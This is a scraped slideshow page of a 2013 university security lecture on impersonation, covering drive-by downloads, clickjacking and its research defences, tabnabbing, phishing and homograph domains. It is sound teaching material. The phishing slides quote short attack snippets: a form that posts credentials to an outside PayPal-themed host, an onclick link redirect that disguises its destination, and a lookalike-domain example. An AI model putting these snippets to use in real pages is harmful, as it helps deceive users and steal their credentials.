impersonation
play

Impersonation CS 161: Computer Security Prof. Vern Paxson TAs: - PowerPoint PPT Presentation

Jan 06, 2024 •166 likes •945 views

Impersonation CS 161: Computer Security Prof. Vern Paxson TAs: Jethro Beekman, Mobin Javed, Antonio Lupher, Paul Pearce & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ March 5, 2013 Goals For Today Web driveby

  1. Impersonation CS 161: Computer Security Prof. Vern Paxson TAs: Jethro Beekman, Mobin Javed, Antonio Lupher, Paul Pearce & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ March 5, 2013

  2. Goals For Today • Web “driveby” attacks • A broad look at the problem of impersonation – Users not interacting with what they think they are • Clickjacking • Phishing • Other deceptive frauds – Servers attempting to tell “Is this ‘user’ really a human?” • CAPTCHAs • With an emphasis on conceptual defenses

  3. Dynamic Web Pages • Rather than static HTML, web pages can be expressed as a program, say written in Javascript : <title>Javascript demo page</title> <font size=30> Threats? Hello, <b> <script> Or what else? Or what else? var a = 1; Java, Flash, var b = 2; Active-X, PDF … document.write("world: ", a+b, "</b>"); </script>

  4. Drive-By Downloads Drive-By download = attack that infects your system just by you visiting a (malicious) web page. Your are now 0wnd!

  12. Defenses Against Driveby Attacks • Sandboxing: rich content (PDF, Flash, …) runs in a constrained environment – Implements Least Privilege • Disable unneeded functionality – Excessive featurism kills! – But not always practical • Patching / autoupdate – Still a race, and can be disruptive • Control exposure to untrusted sites – E.g., Google Safe Browsing : dynamically updated list of malware & phishing sites – Browser warns on any access …

  13. Misleading Users • Browser assumes clicks & keystrokes = clear indication of what the user wants to do – Constitutes part of the user’s trusted path • Attacker can meddle with integrity of this relationship in all sorts of ways …

  15. Stealing Keystrokes (demo)

  16. Misleading Users • Browser assumes clicks & keystrokes = clear indication of what the user wants to do – Constitutes part of the user’s trusted path • Attacker can meddle with integrity of this relationship in all sorts of ways … • Especially, recall the power of Javascript! – Alter page contents (dynamically) – Track events (mouse clicks, motion, keystrokes) – Read/set cookies – Issue web requests, read replies

  17. Using JS to Steal Facebook Likes Claim your FREE iPad • Bait-and-switch • Note: many of these attacks are similar to TOCTTOU (Time of Check to Time of Use) vulnerabilities From Clickjacking: Attacks and Defenses , by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

  18. UI Subversion: Clickjacking • An attack application (script) compromises the context integrity of another application’s User Interface when the user acts on the UI Visual integrity Context integrity consists of Target is visible visual integrity + temporal integrity Pointer is visible 1. Target checked 2. Initiate click 3. Target clicked Temporal integrity Target clicked = Target checked Pointer clicked = Pointer checked From Clickjacking: Attacks and Defenses , by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

  19. Compromise visual integrity – target • Hiding the target • Partial overlays $0.15 $0.15 Click From Clickjacking: Attacks and Defenses , by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

  20. Compromise visual integrity – pointer • Manipulating cursor feedback Claim your FREE iPad From Clickjacking: Attacks and Defenses , by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

  21. Clickjacking to Access the User’s Webcam Fake cursor Real cursor From Clickjacking: Attacks and Defenses , by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

  22. Some Clickjacking Defenses • Require confirmation for actions (annoys users) • Frame-busting: Web site ensures that its “vulnerable” pages can’t be included as a frame inside another browser frame – So user can’t be looking at it with something invisible overlaid on top … – … nor have the site invisible above something else

  23. Attacker implements this by placing Twitter’s page in a “Frame” inside their own page. Otherwise they wouldn’t overlap.

  24. Some Clickjacking Defenses • Require confirmation for actions (annoys users) • Frame-busting: Web site ensures that its “vulnerable” pages can’t be included as a frame inside another browser frame – So user can’t be looking at it with something invisible overlaid on top … – … nor have the site invisible above something else • Conceptually implemented with Javascript like: if ¡(top.location ¡!= ¡self.location) ¡ ¡ ¡ ¡top.location ¡= ¡self.location; (Note: actually quite tricky to get this right!) • Current research considers more general approach …

  25. InContext Defense (Research) • A set of techniques to ensure context integrity for user actions • Server opt-in approach – Let websites indicate their sensitive UIs – Let browsers enforce context integrity when users act on the sensitive UIs attacker.com From Clickjacking: Attacks and Defenses , by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

  26. Ensuring visual integrity of pointer • Remove cursor customization – Attack success: 43% -> 16% From Clickjacking: Attacks and Defenses , by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

  27. Ensuring visual integrity of pointer • Freeze screen around target on pointer entry – Attack success: 43% -> 15% – Attack success (margin=10px): 12% – Attack success (margin=20px): 4% (baseline:5%) Margin=10px Margin=20px From Clickjacking: Attacks and Defenses , by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

  28. Ensuring visual integrity of pointer • Lightbox effect around target on pointer entry – Attack success (Freezing + lightbox): 2% From Clickjacking: Attacks and Defenses , by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

  29. Enforcing temporal integrity • UI delay: after visual changes on target or pointer, invalidate clicks for X ms – Attack success (delay=250ms): 47% -> 2% (2/91) – Attack success (delay=500ms): 1% (1/89) From Clickjacking: Attacks and Defenses , by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

  30. Enforcing temporal integrity • Pointer re-entry: after visual changes on target, invalidate clicks until pointer re-enters target – Attack success: 0% (0/88) 30 From Clickjacking: Attacks and Defenses , by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

  31. Other Forms of UI Sneakiness • Along with stealing events, attackers can use power of Javascript customization / dynamic changes to mess with the user ʼ s mind … • For example, the user may not be paying sufficient attention ... (demo) – Tabnabbing • Or they might find themselves living in The Matrix …

  32. “Browser in Browser” Apparent browser is just a fully interactive image generated by Javascript running in real browser!

  33. 5 Minute Break Questions Before We Proceed?

  34. Phishing

  35. <form ¡action="http://bit.bg/a/paypal.php" method="post" ¡name=Date>

  42. The Problem of Phishing • Arises due to mismatch between reality & user’s: – Perception of how to assess legitimacy – Mental model of what attackers can control • Both Email and Web • Coupled with: – Deficiencies in how web sites authenticate • In particular, “replayable” authentication that is vulnerable to theft • How can we tell when we ʼ re being phished?

  45. Check ¡the ¡URL ¡before ¡clicking? <a ¡href="http://www.ebay.com/" ¡ ¡ ¡onclick="location='http://hackrz.com/'">

  47. Exploits a misfeature in IE that interprets a number here as a 32-bit IP address

  48. Check ¡the ¡URL ¡in ¡address ¡bar?

  51. Homograph Attacks • International domain names can use international character set – E.g., Chinese contains characters that look like / . ? = • Attack : Legitimately register var.cn … • … buy legitimate set of HTTPS certificates for it … • … and then create a subdomain: www.pnc.com⁄webapp⁄unsec⁄homepage.var.cn

  52. Check for padlock?

  54. → Add ¡a ¡clever ¡.favicon ¡with ¡a ¡picture ¡of ¡a ¡padlock

  55. Check for “green glow” in address bar?

  56. Check for everything?

  57. “Browser in Browser”

  58. “Spear Phishing” Targeted phishing that includes details that seemingly must mean it’s legitimate

  59. Yep, this is itself a spear-phishing attack!

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Authentication &amp; Impersonation CS 161: Computer Security Prof. David Wagner February 21, 2013

Authentication &amp; Impersonation CS 161: Computer Security Prof. David Wagner February 21, 2013

Authentication &amp; Impersonation CS 161: Computer Security Prof. David Wagner February 21, 2013 Goals For Today Authentication A broad look at the problem of impersonation Users not interacting with what they think they are

546 views • 38 slides
seclab Impersonation Attacks through a Dedicated Bi-directional Authenticated Channel THE

seclab Impersonation Attacks through a Dedicated Bi-directional Authenticated Channel THE

Protecting Web-based Single Sign-on Protocols against Relying Party seclab Impersonation Attacks through a Dedicated Bi-directional Authenticated Channel THE COMPUTER SECURITY GROUP AT UC SANTA BARBARA Yinzhi Cao

704 views • 45 slides
BIAS: Bluetooth Impersonation AttackS Daniele Antonioli (EPFL), Nils Tippenhauer (CISPA), Kasper

BIAS: Bluetooth Impersonation AttackS Daniele Antonioli (EPFL), Nils Tippenhauer (CISPA), Kasper

IEEE S&amp;P 2020 BIAS: Bluetooth Impersonation AttackS Daniele Antonioli (EPFL), Nils Tippenhauer (CISPA), Kasper Rasmussen (Oxford Univ.) Daniele Antonioli ( @francozappa ) BIAS: Bluetooth Impersonation AttackS 1 Bluetooth standard

923 views • 34 slides
IMP4GT IMPersonation Attacks in 4G NeTworks David Rupprecht , Katharina Kohls, Thorsten Holz, and

IMP4GT IMPersonation Attacks in 4G NeTworks David Rupprecht , Katharina Kohls, Thorsten Holz, and

IMP4GT IMPersonation Attacks in 4G NeTworks David Rupprecht , Katharina Kohls, Thorsten Holz, and Christina Ppper 25.02.2020 NDSS Symposium, San Diego, USA Motivation: Internet Passes 2 LTE Security Aims Mutual Authentication Traffic

766 views • 15 slides
Impersonation CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed

Impersonation CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed

Impersonation CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed &amp; Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ March 1, 2011 Announcements Midterm next Tuesday March 8th Scope is course

820 views • 78 slides
SHA-1 is a Shambles First Chosen-Prefix Collision on SHA-1 and Application to the PGP Web of Trust

SHA-1 is a Shambles First Chosen-Prefix Collision on SHA-1 and Application to the PGP Web of Trust

Introduction Record computation PGP/GPG Impersonation Conclusion SHA-1 is a Shambles First Chosen-Prefix Collision on SHA-1 and Application to the PGP Web of Trust Gatan Leurent Thomas Peyrin Inria, France NTU, Singapore Real World Crypto

1.29k views • 25 slides
Fraud Awareness May 2018 Unrestricted Prevalent Frauds types 1. Social Engineering Phishing,

Fraud Awareness May 2018 Unrestricted Prevalent Frauds types 1. Social Engineering Phishing,

Fraud Awareness May 2018 Unrestricted Prevalent Frauds types 1. Social Engineering Phishing, Vishing 2. Payment Fraud CEO Impersonation, Invoice Fraud. 3. Online / Cyber Fraud Malware &amp; Trojans, Security Software, Social

448 views • 13 slides
Software Security: Defenses CS 161: Computer Security Prof. Vern Paxson TAs: Paul Bramsen, Apoorva

Software Security: Defenses CS 161: Computer Security Prof. Vern Paxson TAs: Paul Bramsen, Apoorva

Software Security: Defenses CS 161: Computer Security Prof. Vern Paxson TAs: Paul Bramsen, Apoorva Dornadula, David Fifield, Mia Gil Epner, David Hahn, Warren He, Grant Ho, Frank Li, Nathan Malkin, Mitar Milutinovic, Rishabh Poddar, Rebecca

583 views • 55 slides
ERISA Overpayments Claims &amp; Defenses AIDS Legal Referral Panel November 14, 2018 MCLE

ERISA Overpayments Claims &amp; Defenses AIDS Legal Referral Panel November 14, 2018 MCLE

ERISA Overpayments Claims &amp; Defenses AIDS Legal Referral Panel November 14, 2018 MCLE Training Kirsten Scott Renaker Hasselman Scott, LLP 235 Montgomery Street, Suite 944 San Francisco, CA 94104 415-653-1733 www.renakerhasselman.com

397 views • 21 slides
Construction/Maintenance Contracts: What You Need To Know During the Pandemic Presentation By:

Construction/Maintenance Contracts: What You Need To Know During the Pandemic Presentation By:

Construction/Maintenance Contracts: What You Need To Know During the Pandemic Presentation By: Timothy M. Scully and Hannah C. Kreuser Presented By: Legal Disclaimer Porter Law Group provides the following presentation and materials for

713 views • 29 slides
A Map for Security Science Fred B. Schneider* Department of Computer Science Cornell University

A Map for Security Science Fred B. Schneider* Department of Computer Science Cornell University

A Map for Security Science Fred B. Schneider* Department of Computer Science Cornell University Ithaca, New York 14853 U.S.A. *Funded by AFOSR, NICECAP, NSF (TRUST STC), and Microsoft. Maps = Features + Relations Features Land mass

748 views • 38 slides
Securing Systems with Insecure Hardware Kaveh Razavi About VUSec ~20 members Software

Securing Systems with Insecure Hardware Kaveh Razavi About VUSec ~20 members Software

Securing Systems with Insecure Hardware Kaveh Razavi About VUSec ~20 members Software protections Binary and malware analysis Fuzzing Network security Hardware and OS security 2 Assuming secure software, what is

984 views • 72 slides
Monday Morning in the ED.. 54 year-old male with palpitations and chest pain AF with RVR, rate

Monday Morning in the ED.. 54 year-old male with palpitations and chest pain AF with RVR, rate

11/4/2013 Monday Morning in the ED.. 54 year-old male with palpitations and chest pain AF with RVR, rate 155 bpm, BP 89/46 Shocking Revelations in Electrical Management of Dysrhythmias Eric Silman, MD Assistant Residency Director,

57 views • 5 slides
Ayala-Paredes, Benoit Coutu, Atul Verma, Franois Philippon, Eli Kalfon, Roopinder K. Sandhu,

Ayala-Paredes, Benoit Coutu, Atul Verma, Franois Philippon, Eli Kalfon, Roopinder K. Sandhu,

Pacemaker or Defibrillator Surgery Without Interruption of Direct Oral Anticoagulants: BRUISE CONTROL - 2 (a randomized controlled trial of continued versus interrupted direct oral anti-coagulant at the time of surgery) David H. Birnie , Jeff S.

364 views • 21 slides
Revive. PIN PINK A Revive. Re A phone powered, compact Automated External Defi fibrillator

Revive. PIN PINK A Revive. Re A phone powered, compact Automated External Defi fibrillator

Revive. PIN PINK A Revive. Re A phone powered, compact Automated External Defi fibrillator (AED) that provides greater access to defi fibrillation at a lower cost co Early defi fibrillation is the only way to restore th the v victi

580 views • 10 slides
Prof Gavin Perkins Chairman ALS Subcommittee Resuscitation Council (UK) Charitable

Prof Gavin Perkins Chairman ALS Subcommittee Resuscitation Council (UK) Charitable

Prof Gavin Perkins Chairman ALS Subcommittee Resuscitation Council (UK) Charitable organisation Founded 1981 Focus Policy document Clinical guidelines Training Research Chain of survival Key messages Resuscitation

404 views • 28 slides
The Future of Cardiac Devices: New devices, indications and ways to use Jeff Healey MD, MSc, FHRS

The Future of Cardiac Devices: New devices, indications and ways to use Jeff Healey MD, MSc, FHRS

The Future of Cardiac Devices: New devices, indications and ways to use Jeff Healey MD, MSc, FHRS Director of Arrhythmia Service PHRI Chair in Cardiology Research McMaster University Evolution of Cardiac Device Therapy Better cardiac

365 views • 19 slides
SoK: Security and Privacy in Implantable Medical Devices and Body Area Networks Michael

SoK: Security and Privacy in Implantable Medical Devices and Body Area Networks Michael

SoK: Security and Privacy in Implantable Medical Devices and Body Area Networks Michael Rushan[JHU], Aviel Rubin[JHU], Denis Foo Kune[Michigan] and Colleen Swanson[Michigan] Presented by: Matthew S. Bauer September 20, 2016 Implantable medical

301 views • 19 slides
Basic Life Support &amp; Automated External Defibrillation Course OBJECTIVES At the end of

Basic Life Support &amp; Automated External Defibrillation Course OBJECTIVES At the end of

European Resuscitation Council Basic Life Support &amp; Automated External Defibrillation Course OBJECTIVES At the end of this course European Resuscitation Council participants should be able to demonstrate: How to assess the

455 views • 34 slides
Welcome!! Welcome from Utah/Boston Introduction CIBC Introduction Center for Integrative

Welcome!! Welcome from Utah/Boston Introduction CIBC Introduction Center for Integrative

Introduction Welcome!! Welcome from Utah/Boston Introduction CIBC Introduction Center for Integrative Biomedical Computation Goals Produce cutting edge software for biomedical researchers and clinicians Develop new techniques and

336 views • 10 slides
V1a 4/29/2017 Statistical Literacy: 2017 V1A 2017 CME 1 V1A 2017 CME 2 . Audience .

V1a 4/29/2017 Statistical Literacy: 2017 V1A 2017 CME 1 V1A 2017 CME 2 . Audience .

V1a 4/29/2017 Statistical Literacy: 2017 V1A 2017 CME 1 V1A 2017 CME 2 . Audience . 40%: School teachers: Current or previous 30%: College faculty: Current or previous 20%: Education, non-profit 10%: Industry, commercial V1A 2017

880 views • 55 slides
Small high-security encryption, authentication, and hashing D. J. Bernstein University of

Small high-security encryption, authentication, and hashing D. J. Bernstein University of

Small high-security encryption, authentication, and hashing D. J. Bernstein University of Illinois at Chicago Main goals of cryptography Alice and Bob are communicating. Eve is eavesdropping. Alice and Bob have several standard security

310 views • 29 slides
STRATEGIES THAT WORK IN EARLY PALLIATION OF CHRONIC DISEASE Tara Lohmann MD FRCPC,

STRATEGIES THAT WORK IN EARLY PALLIATION OF CHRONIC DISEASE Tara Lohmann MD FRCPC,

STRATEGIES THAT WORK IN EARLY PALLIATION OF CHRONIC DISEASE Tara Lohmann MD FRCPC, Respirologist Jessica Simon MB ChB FRCPC, Palliative Care Michael Slawnych MD FRCPC, Cardiologist Chandra Thomas MSc MD FRCPC, Nephrologist

1.04k views • 91 slides
T2DM and cardiovascular risk Richard Hobbs, Professor and Head Nuffield Department of Primary

T2DM and cardiovascular risk Richard Hobbs, Professor and Head Nuffield Department of Primary

T2DM and cardiovascular risk Richard Hobbs, Professor and Head Nuffield Department of Primary Care Health Sciences University of Oxford, United Kingdom Competing interests Speaker or congress sponsorship disclosures in past 5 years: Amgen,

584 views • 43 slides

More recommend